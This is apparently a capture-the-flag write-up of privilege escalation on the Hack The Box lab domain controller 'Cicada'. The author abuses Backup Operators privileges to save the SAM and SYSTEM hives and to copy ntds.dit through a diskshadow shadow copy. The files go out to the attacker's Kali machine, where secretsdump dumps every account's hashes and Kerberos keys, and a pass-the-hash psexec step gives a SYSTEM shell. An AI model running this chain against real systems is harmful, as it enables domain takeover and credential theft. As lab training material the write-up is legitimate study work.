Backup Operators
The emily.oscars user has both SeBackupPrivilege and SeRestorePrivilege granted from a membership to the Backup Operators group. The group is a privileged group that can be leveraged for privilege escalation
Both sebackupprivilege and serestoreprivilege, by default, inherited from membership to the Backup Operators group in an Active Directory environment, along side with a few other privileges that aren’t relevant for privilege escalations.
This was somewhat predicted in the earlier stage of the operation as I knew that the emily.oscars user is part of the Backup Operators group
Essentially, those privileges grants both read/write access to EVERY FILE in the system.
SAM/SYSTEM
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> cmd /c reg save HKLM\SAM sam
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> cmd /c reg save HKLM\SYSTEM system
The operation completed successfully.I can exploit it by just saving the SAM and SYSTEM data since I have both read/write access to EVERY FILE in the system
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download .\sam
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\sam to sam
Info: Download successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download .\system
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\system to system
Info: Download successful!Downloading them to Kali
Hashdump
┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ impacket-secretsdump local -sam ./sam -system system
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up... NTDS.dit
I can also extract the entire AD database
┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ cat diskshadow.txt
set context persistent nowriters
add volume c: alias someAlias
create
expose %somealias% s:First, i need to prepare a script for diskshadow.exe
┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ unix2dos diskshadow.txt
unix2dos: converting file diskshadow.txt to DOS format...Turn it into the dos format so that diskshadow.exe can read it
*Evil-WinRM* PS C:\tmp> upload diskshadow.txt
Info: Uploading /home/kali/archive/htb/labs/cicada/diskshadow.txt to C:\tmp\diskshadow.txt
Data: 128 bytes of 128 bytes copied
Info: Upload successful!Uploading the script
*Evil-WinRM* PS C:\tmp> cmd /c diskshadow.exe /s .\diskshadow.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: CICADA-DC, 9/28/2024 10:17:41 PM
-> set context persistent nowriters
-> add volume c: alias someAlias
-> create
Alias someAlias for shadow ID {5ba7aa1f-cbdd-4aa7-8882-0344ea329a98} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {a0a31be0-5232-48c0-b60c-2cceb4b4c3c3} set as environment variable.
Querying all shadow copies with the shadow copy set ID {a0a31be0-5232-48c0-b60c-2cceb4b4c3c3}
* Shadow copy ID = {5ba7aa1f-cbdd-4aa7-8882-0344ea329a98} %someAlias%
- Shadow copy set: {a0a31be0-5232-48c0-b60c-2cceb4b4c3c3} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{fcebaf9b-0000-0000-0000-500600000000}\ [C:\]
- Creation time: 9/28/2024 10:17:41 PM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: CICADA-DC.cicada.htb
- Service machine: CICADA-DC.cicada.htb
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %somealias% s:
-> %somealias% = {5ba7aa1f-cbdd-4aa7-8882-0344ea329a98}
The shadow copy was successfully exposed as s:\.
->Executing diskshadow.exe
it will basically copy the entire c:\ volume into the arbitrary S:\ volume
*Evil-WinRM* PS C:\tmp> cmd /c robocopy.exe /b S:\Windows\ntds . ntds.dit
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : Saturday, September 28, 2024 10:18:38 PM
Source : S:\Windows\ntds\
Dest : C:\tmp\
Files : ntds.dit
Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
1 S:\Windows\ntds\
New File 16.0 m ntds.dit
0.0%
[...REDACTED...]
100%
------------------------------------------------------------------------------
Total Copied Skipped Mismatch FAILED Extras
Dirs : 1 0 1 0 0 0
Files : 1 1 0 0 0 0
Bytes : 16.00 m 16.00 m 0 0 0 0
Times : 0:00:00 0:00:00 0:00:00 0:00:00
Speed : 134,217,728 Bytes/sec.
Speed : 7,680.000 MegaBytes/min.
Ended : Saturday, September 28, 2024 10:18:38 PMnow, i can copy the ad database file, ntds.dit, into the current directory from the s:\ volume using robocopy.exe
*Evil-WinRM* PS C:\tmp> download ntds.dit
Info: Downloading C:\tmp\ntds.dit to ntds.dit
Info: Download successful!Downloading it to Kali
Hashdump
┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ impacket-secretsdump local -sam ./sam -system ./system -ntds ./ntds.dit 1 ⨯
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: f954f575c626d6afe06c2b80cc2185e6
[*] Reading and decrypting hashes from ./ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
CICADA-DC$:1000:aad3b435b51404eeaad3b435b51404ee:188c2f3cb7592e18d1eae37991dee696:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3779000802a4bb402736bee52963f8ef:::
cicada.htb\john.smoulder:1104:aad3b435b51404eeaad3b435b51404ee:0d33a055d07e231ce088a91975f28dc4:::
cicada.htb\sarah.dantelia:1105:aad3b435b51404eeaad3b435b51404ee:d1c88b5c2ecc0e2679000c5c73baea20:::
cicada.htb\michael.wrightson:1106:aad3b435b51404eeaad3b435b51404ee:b222964c9f247e6b225ce9e7c4276776:::
cicada.htb\david.orelious:1108:aad3b435b51404eeaad3b435b51404ee:ef0bcbf3577b729dcfa6fbe1731d5a43:::
cicada.htb\emily.oscars:1601:aad3b435b51404eeaad3b435b51404ee:559048ab2d168a4edf8e033d43165ee5:::
[*] Kerberos keys from ./ntds.dit
Administrator:aes256-cts-hmac-sha1-96:e47fd7646fa8cf1836a79166f5775405834e2c060322d229bc93f26fb67d2be5
Administrator:aes128-cts-hmac-sha1-96:f51b243b116894bea389709127df1652
Administrator:des-cbc-md5:c8838c9b10c43b23
CICADA-DC$:aes256-cts-hmac-sha1-96:e9752f2c7752bd92142588e63dc0383499f49b04a46de37845e33d40de1db7ed
CICADA-DC$:aes128-cts-hmac-sha1-96:7fc8e7f2daa14d0ccdf070de9cfc49c5
CICADA-DC$:des-cbc-md5:b0f7cdec040d5b6d
krbtgt:aes256-cts-hmac-sha1-96:357f15dd4d315af47ac63658c444526ec0186f066ad9efb46906a7308b7c60c8
krbtgt:aes128-cts-hmac-sha1-96:39cbc0f220550c51fb89046ac652849e
krbtgt:des-cbc-md5:73b6c419b3b9bf7c
cicada.htb\john.smoulder:aes256-cts-hmac-sha1-96:57ae6faf294b7e6fbd0ce5121ac413d529ae5355535e20739a19b6fd2a204128
cicada.htb\john.smoulder:aes128-cts-hmac-sha1-96:8c0add65bd3c9ad2d1f458a719cfda81
cicada.htb\john.smoulder:des-cbc-md5:f1feaeb594b08575
cicada.htb\sarah.dantelia:aes256-cts-hmac-sha1-96:e25f0b9181f532a85310ba6093f24c1f2f10ee857a97fe18d716ec713fc47060
cicada.htb\sarah.dantelia:aes128-cts-hmac-sha1-96:2ac9a92bca49147a0530e5ce84ceee7d
cicada.htb\sarah.dantelia:des-cbc-md5:0b5b014370fdab67
cicada.htb\michael.wrightson:aes256-cts-hmac-sha1-96:d89ff79cc85032f27499425d47d3421df678eace01ce589eb128a6ffa0216f46
cicada.htb\michael.wrightson:aes128-cts-hmac-sha1-96:f1290a5c4e9d4ef2cd7ad470600124a9
cicada.htb\michael.wrightson:des-cbc-md5:eca8d532fd8f26bc
cicada.htb\david.orelious:aes256-cts-hmac-sha1-96:125726466d0431ed1441caafe8c0ed9ec0d10b0dbaf4fec7a184b764d8a36323
cicada.htb\david.orelious:aes128-cts-hmac-sha1-96:ce66c04e5fd902b15f5d4c611927c9c2
cicada.htb\david.orelious:des-cbc-md5:83585bc41573897f
cicada.htb\emily.oscars:aes256-cts-hmac-sha1-96:4abe28adc1d16373f4c8db4d9bfd34ea1928aca72cb69362d3d90f69d80c000f
cicada.htb\emily.oscars:aes128-cts-hmac-sha1-96:f98d74d70dfb68b70ddd821edcd6a023
cicada.htb\emily.oscars:des-cbc-md5:fd4a5497d38067cd
[*] Cleaning up... Domain Level Compromise
Shell Drop
┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ impacket-psexec administrator@$IP -hashes :2b87e7c93a3e8a0ea4a581937016f341
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Requesting shares on 10.129.41.192.....
[*] Found writable share ADMIN$
[*] Uploading file ryqUmWKu.exe
[*] Opening SVCManager on 10.129.41.192.....
[*] Creating service HqZr on 10.129.41.192.....
[*] Starting service HqZr.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.2700]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
CICADA-DC
C:\Windows\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::29
IPv6 Address. . . . . . . . . . . : dead:beef::46c0:3971:5ebf:3844
Link-local IPv6 Address . . . . . : fe80::f65a:ca26:f7f6:2508%6
IPv4 Address. . . . . . . . . . . : 10.129.41.192
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:fe94:3911%6
10.129.0.1System Level Compromise